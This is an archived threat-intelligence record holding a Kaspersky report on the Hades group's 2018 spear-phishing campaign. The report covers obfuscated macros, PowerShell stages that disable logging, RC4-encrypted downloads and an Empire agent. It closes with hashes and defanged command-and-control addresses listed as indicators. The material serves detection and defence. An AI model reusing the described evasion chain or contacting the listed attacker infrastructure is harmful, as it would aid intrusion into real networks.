{ "id": "d871bad9-8ce9-4586-8fed-9bede916955f", "created_at": "2026-04-06T00:20:07.032614Z", "updated_at": "2026-04-10T03:37:50.475913Z", "deleted_at": null, "sha1_hash": "97a0b7ff3bd751eddc43f2b0fc62f7261f0bcde0", "title": "Hades, the actor behind Olympic Destroyer is still alive", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 916342, "plain_text": "Hades, the actor behind Olympic Destroyer is still alive\r\nBy GReAT\r\nPublished: 2018-06-19 · Archived: 2026-04-05 16:11:38 UTC\r\nIn March 2018 we published our research on Olympic Destroyer, an advanced attack that hit organizers, suppliers\r\nand partners of the Winter Olympic Games 2018 held in Pyeongchang, South Korea. Olympic Destroyer was a\r\ncyber-sabotage attack based on the spread of a destructive network worm. The sabotage stage was preceded by\r\nreconnaissance and infiltration into target networks to select the best launchpad for the self-replicating and self-modifying destructive malware.\r\nWe are calling the actor behind the Olympic Destroyer attack – “Hades”. We have previously emphasized that\r\nHades is different from other threat actors because the whole attack was a masterful operation in deception.\r\nDespite that, the attackers made serious mistakes, which helped us to spot and prove the forgery of rare attribution\r\nartefacts. The attackers behind Olympic Destroyer forged automatically generated signatures, known as Rich\r\nHeader, to make it look like the malware was produced by Lazarus APT, an actor widely believed to be associated\r\nwith North Korea. If this is new to the reader, we recommend a separate blog dedicated to the analysis of this\r\nforgery.\r\nThe deceptive behavior of Hades and its excessive use of various false flags, which tricked many researchers in\r\nthe infosecurity industry, got our attention. Based on malware similarity, the Olympic Destroyer malware was\r\nlinked by other researchers to three Chinese speaking APT actors and the allegedly North Korean Lazarus APT;\r\nsome code had hints of the EternalRomance exploit, while other code was similar to the Netya (Expetr/NotPetya)\r\nand BadRabbit targeted ransomware. Kaspersky Lab managed to find lateral movement tools and initial infection\r\nbackdoors, and has followed the infrastructure used to control Olympic Destroyer in one of its South Korean\r\nvictims.\r\nSome of the TTPs and operational security used by Hades during the Olympic Destroyer attack bear a certain\r\nresemblance to Sofacy APT group activity. When it comes to false flags, mimicking TTPs is much harder than\r\ntampering with technical artefacts. It implies a deep knowledge of how the actor being mimicked operates as well\r\nas operational adaptation to these new TTPs. However, it is important to remember that Hades can be considered a\r\nmaster in the use of false flags: for now we assess that connection with low to moderate confidence.\r\nWe decided to keep tracking the Hades group and set our virtual ‘nets’ to catch them again if it showed up with a\r\nsimilar arsenal. To our surprise it has recently resurfaced with new activity.\r\nIn May-June 2018 we discovered new spear-phishing documents that closely resembled weaponized documents\r\nused by Hades in the past. This and other TTPs led us to believe that we were looking at the same actor again.\r\nHowever, this time the attacker has new targets. According to our telemetry and the characteristics of the analyzed\r\nspear-phishing documents, we believe the attackers are now targeting financial organizations in Russia, and\r\nbiological and chemical threat prevention laboratories in Europe and Ukraine. They continue to use a non-binary\r\nexecutable infection vector and obfuscated scripts to evade detection.\r\nhttps://securelist.com/olympic-destroyer-is-still-alive/86169/\r\nPage 1 of 13\n\nSimplified infection procedure\r\nInfection Analysis\r\nIn reality the infection procedure is a bit more complex and relies on multiple different technologies, mixing VBA\r\ncode, Powershell, MS HTA, with JScript inside and more Powershell. Let’s take a look at this more closely to let\r\nincident responders and security researchers recognize such an attack at any time in the future.\r\nOne of the recent documents that we discovered had the following properties:\r\nMD5: 0e7b32d23fbd6d62a593c234bafa2311\r\nSHA1: ff59cb2b4a198d1e6438e020bb11602bd7d2510d\r\nFile Type: Microsoft Office Word\r\nLast saved date: 2018-05-14 15:32:17 (GMT)\r\nKnown file name: Spiez CONVERGENCE.doc\r\nThe embedded macro is heavily obfuscated. It has a randomly-generated variable and function name.\r\nObfuscated VBA macro\r\nIts purpose is to execute a Powershell command. This VBA code was obfuscated with the same technique used in\r\nthe original Olympic Destroyer spear-phishing campaign.\r\nIt starts a new obfuscated Powershell scriptlet via the command line. The obfuscator is using array-based\r\nrearranging to mutate original code, and protects all commands and strings such as the command and control (C2)\r\nserver address.\r\nhttps://securelist.com/olympic-destroyer-is-still-alive/86169/\r\nPage 2 of 13\n\nThere is one known obfuscation tool used to produce such an effect: Invoke-Obfuscation.\r\nObfuscated commandline Powershell scriptlet\r\nThis script disables Powershell script logging to avoid leaving traces:\r\nIt has an inline implementation of the RC4 routine in Powershell, which is used to decrypt additional payload\r\ndownloaded from Microsoft OneDrive. The decryption relies on a hardcoded 32-byte ASCII hexadecimal alphabet\r\nkey. This is a familiar technique used in other Olympic Destroyer spear-phishing documents in the past and in\r\nPowershell backdoors found in the infrastructure of Olympic Destroyer’s victims located in Pyeongchang.\r\n[/caption]\r\nhttps://securelist.com/olympic-destroyer-is-still-alive/86169/\r\nPage 3 of 13\n\nThe second stage payload downloaded is an HTA file that also executes a Powershell script.\r\nDownloaded access.log.txt\r\nThis file has a similar structure to the Powershell script executed by the macro in spear-phishing attachments.\r\nAfter deobfuscating it, we can see that this script also disables Powershell logging and downloads the next stage\r\npayload from the same server address. It also uses RC4 with a pre-defined key:\r\nThe final payload is the Powershell Empire agent. Below we partially provide the http stager scriptlet for the\r\ndownloaded Empire agent.\r\nPowershell Empire is a post-exploitation free and open-source framework written in Python and Powershell that\r\nallows fileless control of the compromised hosts, has modular architecture and relies on encrypted\r\ncommunication. This framework is widely used by penetration-testing companies in legitimate security tests for\r\nlateral movement and information gathering.\r\nhttps://securelist.com/olympic-destroyer-is-still-alive/86169/\r\nPage 4 of 13\n\nInfrastructure\r\nWe believe that the attackers used compromised legitimate web servers for hosting and controlling malware.\r\nBased on our analysis, the URI path of discovered C2 servers included the following paths:\r\n/components/com_tags/views\r\n/components/com_tags/views/admin\r\n/components/com_tags/controllers\r\n/components/com_finder/helpers\r\n/components/com_finder/views/\r\n/components/com_j2xml/\r\n/components/com_contact/controllers/\r\nThese are known directory structures used by a popular open source content management system, Joomla:\r\nJoomla components path on Github\r\nUnfortunately we don’t know what exact vulnerability was exploited in the Joomla CMS. What is known is that\r\none of the payload hosting servers used Joomla v1.7.3, which is an extremely old version of this software,\r\nreleased in November 2011.\r\nA compromised server using Joomla\r\nVictims and Targets\r\nBased on several target profiles and limited victim reports, we believe that the recent operations by Hades target\r\nRussia, Ukraine and several other European countries. According to our telemetry, several victims are entities\r\nfrom the financial sector in Russia. In addition, almost all the samples we found were uploaded to a multi-scanner\r\nhttps://securelist.com/olympic-destroyer-is-still-alive/86169/\r\nPage 5 of 13\n\nservice from European countries such as the Netherlands, Germany and France, as well as from Ukraine and\r\nRussia.\r\nLocation of targets in recent Hades attacks\r\nSince our visibility is limited, we can only speculate about the potential targets based on the profiles suggested by\r\nthe content of selected decoy documents, email subjects or even file names picked by the attackers.\r\nOne such decoy document grabbed our attention. It referred to ‘Spiez Convergence’, a bio-chemical threat\r\nresearch conference held in Switzerland, organized by SPIEZ LABORATORY, which not long ago was involved\r\nin the Salisbury attack investigation.\r\nhttps://securelist.com/olympic-destroyer-is-still-alive/86169/\r\nPage 6 of 13\n\nDecoy document using Spiez Convergence topic\r\nAnother decoy document observed in the attacks (‘Investigation_file.doc’) references the nerve agent used to\r\npoison Sergey Skripal and his daughter in Salisbury:\r\nhttps://securelist.com/olympic-destroyer-is-still-alive/86169/\r\nPage 7 of 13\n\nSome other spear-phishing documents include words in the Russian and German language in their names:\r\n9bc365a16c63f25dfddcbe11da042974 Korporativ.doc\r\nda93e6651c5ba3e3e96f4ae2dd763d94 Korporativ_2018.doc\r\ne2e102291d259f054625cc85318b7ef5 E-Mail-Adressliste_2018.doc\r\nOne of the documents included a lure image with perfect Russian language in it.\r\nhttps://securelist.com/olympic-destroyer-is-still-alive/86169/\r\nPage 8 of 13\n\nA message in Russian encouraging the user to enable macro (54b06b05b6b92a8f2ff02fdf47baad0e)\r\nOne of the most recent weaponized documents was uploaded to a malware scanning service from Ukraine in a file\r\nnamed ‘nakaz.zip’, containing ‘nakaz.doc’ (translated as ‘order.doc’ from Ukrainian).\r\nAnother lure message to encourage the user to enable macro\r\nAccording to metadata, the document was edited on June 14th. The Cyrillic messages inside this and previous\r\ndocuments are in perfect Russian, suggesting that it was probably prepared with the help of a native speaker and\r\nnot automated translation software.\r\nOnce the user enables macro, a decoy document is displayed, taken very recently from a Ukrainian state\r\norganization (the date inside indicates 11 June 2018). The text of the document is identical to the one on the\r\nofficial website of the Ukrainian Ministry of Health.\r\nhttps://securelist.com/olympic-destroyer-is-still-alive/86169/\r\nPage 9 of 13\n\nDecoy document inside nakaz.doc\r\nFurther analysis of other related files suggest that the target of this document is working in the biological and\r\nepizootic threat prevention field.\r\nAttribution\r\nAlthough not comprehensive, the following findings can serve as a hint to those looking for a better connection\r\nbetween this campaign and previous Hades activity. More information on overlaps and reliable tracking of Hades’\r\nattacks is available to subscribers of Kaspersky Intelligence Reporting Services (see below).\r\nhttps://securelist.com/olympic-destroyer-is-still-alive/86169/\r\nPage 10 of 13\n\nSimilar obfuscated macro structure\r\nThe documents above show apparent structural similarity as if they were produced by the same tool and\r\nobfuscator. The highlighted function name in the new wave of attacks isn’t in fact new. While being uncommon, a\r\nfunction named “MultiPage1_Layout” was also found in the Olympic Destroyer spear phishing document (MD5:\r\n5ba7ec869c7157efc1e52f5157705867).\r\nSame MultiPage1_Layout function name used in older campaign\r\nConclusions\r\nDespite initial expectations for it to stay low or even disappear, Hades, the actor behind the Olympic Destroyer\r\nattack, has resurfaced with new attacks in Europe, Russia and Ukraine. In late 2017, a similar reconnaissance\r\nstage preceded a larger cyber-sabotage stage meant to destroy and paralyze infrastructure of the Winter Olympic\r\nhttps://securelist.com/olympic-destroyer-is-still-alive/86169/\r\nPage 11 of 13\n\nGames as well as related supply chains, partners and even venues at the event location. It’s possible that in this\r\ncase we have observed a reconnaissance stage that will be followed by a wave of destructive attacks with new\r\nmotives. That is why it is important for all bio-chemical threat prevention and research companies and\r\norganizations in Europe to strengthen their security and run unscheduled security audits.\r\nThe variety of financial and non-financial targets could indicate that the same malware was used by several groups\r\nwith different interests – i.e. a group primarily interested in financial gain through cybertheft and another group or\r\ngroups looking for espionage targets. This could also be a result of cyberattack outsourcing, which is not\r\nuncommon among nation state actors. On the other hand, the financial targets might be another false flag\r\noperation by an actor who has already excelled at this during the Pyeongchang Olympics to redirect researchers’\r\nattention.\r\nCertain conclusions could be made based on motives and the selection of targets in this campaign. However, it is\r\neasy to make a mistake when trying to answer the question of who is behind this campaign with only the\r\nfragments of the picture that are visible to researchers. Hades’ Olympic Destroyer-related activities at the\r\nbeginning of this year, with their sophisticated deception efforts, changed the attribution game forever. We believe\r\nthat it is no longer possible to draw conclusions based on few attribution vectors discovered during regular\r\ninvestigation. The resistance to and deterrence of threats such as Olympic Destroyer should be based on\r\ncooperation between the private sector and governments across national borders. Unfortunately, the current\r\ngeopolitical situation in the world only boosts the global segmentation of the internet and introduces many\r\nobstacles for researchers and investigators. This will encourage APT attackers to continue marching into the\r\nprotected networks of foreign governments and commercial companies.\r\nThe best thing we can do as researchers is to keep tracking threats like this. We will keep monitoring Hades and\r\nreport on new discovered activities of this group.\r\nMore details about Hades, Olympic Destroyer and related activity are available to subscribers of Kaspersky\r\nIntelligence Reporting services. Contact: intelreports@kaspersky.com\r\nIndicators Of Compromise\r\nFile Hashes\r\n9bc365a16c63f25dfddcbe11da042974 Korporativ .doc\r\nda93e6651c5ba3e3e96f4ae2dd763d94 Korporativ_2018.doc\r\n6ccd8133f250d4babefbd66b898739b9 corporativ_2018.doc\r\nabe771f280cdea6e7eaf19a26b1a9488 Scan-2018-03-13.doc.bin\r\nb60da65b8d3627a89481efb23d59713a Corporativ_2018.doc\r\nb94bdb63f0703d32c20f4b2e5500dbbe\r\nbb5e8733a940fedfb1ef6b0e0ec3635c recommandation.doc\r\n97ddc336d7d92b7db17d098ec2ee6092 recommandation.doc\r\n1d0cf431e623b21aeae8f2b8414d2a73 Investigation_file.doc\r\n0e7b32d23fbd6d62a593c234bafa2311 Spiez CONVERGENCE.doc\r\ne2e102291d259f054625cc85318b7ef5 E-Mail-Adressliste_2018.doc\r\nhttps://securelist.com/olympic-destroyer-is-still-alive/86169/\r\nPage 12 of 13\n\n0c6ddc3a722b865cc2d1185e27cef9b8\r\n54b06b05b6b92a8f2ff02fdf47baad0e\r\n4247901eca6d87f5f3af7df8249ea825 nakaz.doc\r\nDomains and IPs\r\n79.142.76[.]40:80/news.php\r\n79.142.76[.]40:8989/login/process.php\r\n79.142.76[.]40:8989/admin/get.php\r\n159.148.186[.]116:80/admin/get.php\r\n159.148.186[.]116:80/login/process.php\r\n159.148.186[.]116:80/news.php\r\n****.****.edu[.]br/components/com_finder/helpers/access.log\r\n****.****.edu[.]br/components/com_finder/views/default.php\r\nnarpaninew.linuxuatwebspiders[.]com/components/com_j2xml/error.log\r\nnarpaninew.linuxuatwebspiders[.]com/components/com_contact/controllers/main.php\r\nmysent[.]org/access.log.txt\r\nmysent[.]org/modules/admin.php\r\n5.133.12[.]224:333/admin/get.php\r\nNote: this blogpost was updated July 25, 2019, to include Hades as the name of the actor behind the Olympic\r\nDestroyer attack.\r\nSource: https://securelist.com/olympic-destroyer-is-still-alive/86169/\r\nhttps://securelist.com/olympic-destroyer-is-still-alive/86169/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://securelist.com/olympic-destroyer-is-still-alive/86169/" ], "report_names": [ "86169" ], "threat_actors": [ { "id": "8670f370-1865-4264-9a1b-0dfe7617c329", "created_at": "2022-10-25T16:07:23.69953Z", "updated_at": "2026-04-10T02:00:04.716126Z", "deleted_at": null, "main_name": "Hades", "aliases": [ "Operation TrickyMouse" ], "source_name": "ETDA:Hades", "tools": [ "Brave Prince", "Gold Dragon", "GoldDragon", "Lovexxx", "Olympic Destroyer", "Running RAT", "RunningRAT", "SOURGRAPE", "running_rat" ], "source_id": "ETDA", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434807, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/97a0b7ff3bd751eddc43f2b0fc62f7261f0bcde0.pdf", "text": "https://archive.orkl.eu/97a0b7ff3bd751eddc43f2b0fc62f7261f0bcde0.txt", "img": "https://archive.orkl.eu/97a0b7ff3bd751eddc43f2b0fc62f7261f0bcde0.jpg" } }